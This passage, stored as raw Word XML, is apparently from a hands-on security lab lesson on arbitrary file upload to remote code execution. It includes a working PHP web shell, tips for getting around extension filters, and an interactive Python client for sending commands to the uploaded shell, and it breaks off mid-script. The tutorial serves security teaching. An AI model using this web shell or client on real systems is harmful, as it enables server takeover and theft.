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99118F" wp14:paraId="7E7AD019" wp14:textId="68E1FC85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Arbitrary File Upload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="4F68E8EA" wp14:textId="23B34968"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="6E6BC5B3" wp14:textId="50976B9F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Arbitrary file uploads are among the most critical vulnerabilities. These flaws enable attackers to upload malicious files, execute arbitrary commands on the back-end server, and even take control over the entire server. Arbitrary file upload vulnerabilities affect web applications and APIs alike.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6DE0361D" wp14:textId="4EED0EF9"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="3C77423E" wp14:textId="6800BA48">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PHP File Upload via API to RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="1953BE3A" wp14:textId="7DFC1E55">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Proceed to the end of this section and click on Click here to spawn the target system! or the Reset Target icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target application and follow along.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="5B6B0C41" wp14:textId="5F23E8E9">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Suppose we are assessing an application residing in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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="367C69EF" wp14:textId="4ABB2DC4">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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When we browse the application, an anonymous file uploading functionality sticks out. </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="38DF90A1" wp14:anchorId="6EA8708F">
            <wp:extent cx="4572000" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="349164958" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R65bc82fecdc14b40">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="056024A7" wp14:textId="73052D6D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us create the below file (save it as backdoor.php) and try to upload it via the available functionality.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="1E6A07D4" wp14:textId="5540B3D3">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: php</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="6534511A" wp14:textId="6D5C0D5B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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&lt;?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="40F7C2DB" wp14:textId="2B7B8B17">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">The above allows us to append the parameter </w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to our request (to backdoor.php), which will be executed using </w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>shell_exec()</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is if we can determine </w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">'s location, if </w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be rendered successfully and if no PHP function restrictions exist.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="463753B6" wp14:textId="187F2492">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="1401A3D9" wp14:anchorId="6BB57C3E">
            <wp:extent cx="4572000" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1774199958" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3f88d4cf09c347c8">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="0D1B75BE" wp14:textId="331D9E5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99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> was successfully uploaded via a POST request to /api/upload/. An API seems to be handling the file uploading functionality of the application.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="2BFD3D5C" wp14:textId="4F38ED8D">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The content type has been automatically set to application/x-php, which means there is no protection in place. The content type would probably be set to application/octet-stream or text/plain if there was one.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="19863E6F" wp14:textId="34BE5470">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Uploading a file with a </w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension is also allowed. If there was a limitation on the extensions, we could try extensions such as .jpg.php, .PHP, etc.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="6EFB9BCB" wp14:textId="51B35592">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Using something like </w:t>
      </w:r>
      <w:hyperlink r:id="Rc01ba33b504d4b92">
        <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>file_get_contents()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify php code being uploaded seems not in place either.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="60AF64FA" wp14:textId="7871DFDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>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We also receive the location where our file is stored,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IP&gt;:3001/uploads/backdoor.php.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="5CDD76E1" wp14:textId="57FB49C7">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can use the below Python script (save it as web_shell.py) to obtain a shell, leveraging the uploaded backdoor.php file.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="67AFDD37" wp14:textId="3E6850C8">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="5664A113" wp14:textId="26CD295E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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import argparse, time, requests, os # imports four modules argparse (used for system arguments), time (used for time), requests (used for HTTP/HTTPs Requests), os (used for operating system commands)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs") # generates a variable called parser and uses argparse to create a description</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">parser.add_argument("-t", "--target", help="Specify the target host E.g.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IP&gt;:3001/uploads/backdoor.php", required=True) # specifies flags such as -t for a target with a help and required option being true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload") # similar to above</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t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IP&gt;:3001/uploads/backdoor.php -o yes") # similar to above</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>args = parser.parse_args() # defines args as a variable holding the values of the above arguments so we can do args.option for example.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if args.target == None and args.payload == None: # checks if args.target (the url of the target) and the payload is blank if so it'll show the help menu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    parser.print_help() # shows help menu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>elif args.target and args.payload: # elif (if they both have values do some action)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(requests.get(args.target+"/?cmd="+args.payload).text) ## sends the request with a GET method with the targets URL appends the /?cmd= param and the payload and then prints out the value using .text because we're already sending it within the print() function</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>if args.target and args.option == "yes": # if the target option is set and args.option is set to yes (for a full interactive shell)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    os.system("clear") # clear the screen (linux)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True: # starts a while loop (never ending loop)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        try: # try statement</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            cmd = input("$ ") # defines a cmd variable for an input() function which our user will enter</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            print(requests.get(args.target+"/?cmd="+cmd).text) # same as above except with our input() function value</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            time.sleep(0.3) # waits 0.3 seconds during each request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        except requests.exceptions.InvalidSchema: # error handling</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("Invalid URL Schema: </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        except requests.exceptions.ConnectionError: # error handling</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
